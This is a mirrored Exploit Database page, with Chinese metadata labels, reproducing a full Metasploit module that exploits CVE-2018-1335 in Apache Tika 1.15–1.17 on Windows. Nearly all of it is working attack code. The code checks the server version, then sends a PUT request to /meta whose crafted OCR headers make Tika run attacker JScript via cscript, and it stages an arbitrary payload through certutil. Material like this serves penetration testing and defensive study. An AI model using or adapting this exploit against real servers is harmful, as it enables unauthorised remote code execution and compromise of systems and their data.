Apache Tika 1.15 – 1.17 – Header Command Injection (Metasploit)

• Exploit Database
• 61 阅读

• 作者： Metasploit
  日期： 2019-08-05
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47208/

• ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'Apache Tika Header Command Injection',
  'Description'=> %q{
  This module exploits a command injection vulnerability in Apache
  Tika 1.15 - 1.17 on Windows.A file with the image/jp2 content-type is
  used to bypass magic bytes checking.When OCR is specified in the
  request, parameters can be passed to change the parameters passed
  at command line to allow for arbitrary JScript to execute. A
  JScript stub is passed to execute arbitrary code. This module was
  verified against version 1.15 - 1.17 on Windows 2012.
  While the CVE and finding show more versions vulnerable, during
  testing it was determined only > 1.14 was exploitable due to
  jp2 support being added.
  },
  'License'=> MSF_LICENSE,
  'Privileged' => false,
  'Platform' => 'win',
  'Targets'=>
  [
  ['Windows',
  {'Arch' => [ARCH_X86, ARCH_X64],
  'Platform' => 'win',
  'CmdStagerFlavor' => ['certutil']
  }
  ]
  ],
  'DefaultTarget'=> 0,
  'DisclosureDate' => 'Apr 25 2018',
  'Author' =>
  [
  'h00die', # msf module
  'David Yesland', # edb submission
  'Tim Allison' # discovery
  ],
  'References' =>
  [
  ['EDB', '46540'],
  ['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],
  ['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],
  ['CVE', '2018-1335']
  ]))
  
  register_options(
  [
  Opt::RPORT(9998),
  OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
  ])
  
  register_advanced_options(
  [
  OptBool.new('ForceExploit', [true, 'Override check result', false])
  ])
  end
  
  def check
  res = send_request_cgi({
   'uri'=> normalize_uri(target_uri),
   })
  if res.nil?
  vprint_error('No server response, check configuration')
  return CheckCode::Safe
  elsif res.code != 200
  vprint_error('No server response, check configuration')
  return CheckCode::Safe
  end
  
  if res.body =~ /Apache Tika (\d.[\d]+)/
  version = Gem::Version.new($1)
  vprint_status("Apache Tika Version Detected: #{version}")
  if version.between?(Gem::Version.new('1.15'), Gem::Version.new('1.17'))
  return CheckCode::Vulnerable
  end
  end
  CheckCode::Safe
  end
  
  def execute_command(cmd, opts = {})
  cmd.gsub(/"/, '\"')
  jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
  jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"
  
  print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
  res = send_request_cgi({
   'method' => 'PUT',
   'uri'=> normalize_uri(target_uri, 'meta'),
   'headers' => {
  "X-Tika-OCRTesseractPath" => '"cscript"',
  "X-Tika-OCRLanguage"=> "//E:Jscript",
  "Expect"=> "100-continue",
  "Content-type"=> "image/jp2",
  "Connection"=> "close"},
   'data' => jscript
   })
  
  fail_with(Failure::Disconnected, 'No server response') unless res
  unless (res.code == 200 && res.body.include?('tika'))
  fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
  end
  end
  
  def exploit
  checkcode = check
  unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
  print_error("#{checkcode[1]}. Set ForceExploit to override.")
  return
  end
  
  execute_cmdstager(linemax: 8000)
  end
  end